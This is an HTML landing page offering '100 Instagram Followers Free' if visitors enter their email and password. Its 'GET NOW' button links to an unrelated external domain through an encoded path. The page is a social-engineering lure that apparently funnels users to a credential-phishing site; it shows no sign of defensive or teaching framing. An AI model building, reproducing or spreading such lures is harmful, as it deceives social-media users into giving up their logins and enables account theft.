<html>
  <head>
    <title>Get 100 Instagram Followers Free</title>
    <style>

      body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        display: flex;
        align-items: center;
        justify-content: center;
        background-color: #f3f3f3;
      }
      
      .container {
        border: 2px solid gray;
        width:40rem;
        height: 20rem;
        
        text-align: center;
        justify-content: center;
        background: linear-gradient(rgb(131, 18, 131),rgb(250, 56, 218),rgb(102, 49, 248));
      }
      
      h1 {
        font-size: 2.5em;
        color: rgb(255, 255, 255);
      }
      
      p {
        font-size: 1.2em;
        color: rgb(255, 253, 253);
      }
      
      .button-container {
        margin-top: 20px;
      }
      
      button {
        background-color: #9b07fd;
        color: white;
        border: none;
        padding: 15px 32px;
        text-align: center;
        text-decoration: none;
        display: inline-block;
        font-size: 1.2em;
        margin: 0 auto;
        cursor: pointer;
        box-shadow: 0px 5px 15px 3px rgb(161, 7, 192);
      }
      a{
        text-decoration: none;
     }

    </style>
  </head>
  <body>
    <div class="container">
      <h1>Get 100 Instagram Followers Free</h1>
      <p>Enter id emali and password and get 100 followers for free! Limited time offer.</p>
      <div class="button-container">
       <a href="https://gregorian-immobilien.de/ZW4vMzA4YTRkMzM2SDBGM1g="><button>GET NOW</button></a> 
      </div>
    </div>
  </body>
</html>